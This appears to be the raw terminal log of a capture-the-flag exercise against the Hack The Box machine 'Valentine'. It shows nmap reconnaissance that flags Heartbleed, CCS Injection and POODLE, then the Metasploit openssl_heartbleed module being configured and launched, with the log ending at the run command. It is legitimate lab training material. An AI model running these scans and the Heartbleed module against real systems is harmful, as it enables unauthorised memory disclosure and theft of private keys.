┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.79
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 11:35 CST
Warning: 10.10.10.79 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.79
Host is up (0.072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds
┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,443 10.10.10.79
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 11:36 CST
Nmap scan report for 10.10.10.79
Host is up (0.073s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2024-09-03T03:27:14+00:00; -9m59s from scanner time.
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Nokia N9 phone (Linux 2.6.32) (96%), Linux 3.0 (96%), Linux 2.6.32 - 3.5 (95%), Linux 3.2 (95%), Linux 2.6.38 - 3.0 (94%), Linux 2.6.38 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.5 (93%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 - 3.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -9m59s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.95 seconds
┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,443 10.10.10.79
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 11:38 CST
Nmap scan report for 10.10.10.79
Host is up (0.43s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
443/tcp open  https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt
|       http://cvedetails.com/cve/2014-0160/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|       The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|       products, uses nondeterministic CBC padding, which makes it easier
|       for man-in-the-middle attackers to obtain cleartext data via a
|       padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.securityfocus.com/bid/70574
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-enum:
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 52.34 seconds
   #  Name                                                    Disclosure Date  Rank    Check  Description
   -  ----                                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/elasticsearch_memory_disclosure  2021-07-21       normal  Yes    Elasticsearch Memory Disclosure
   1    \_ action: DUMP                                       .                .       .      Dump memory contents to loot
   2    \_ action: SCAN                                       .                .       .      Check hosts for vulnerability
   3  auxiliary/server/openssl_heartbeat_client_memory        2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
   4  auxiliary/scanner/ssl/openssl_heartbleed                2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   5    \_ action: DUMP                                       .                .       .      Dump memory contents to loot
   6    \_ action: KEYS                                       .                .       .      Recover private keys from memory
   7    \_ action: SCAN                                       .                .       .      Check hosts for vulnerability

Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/ssl/openssl_heartbleed
After interacting with a module you can manually set a ACTION with set ACTION 'SCAN'

msf6 > use 4
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > options

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 10.10.10.79
rhost => 10.10.10.79
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run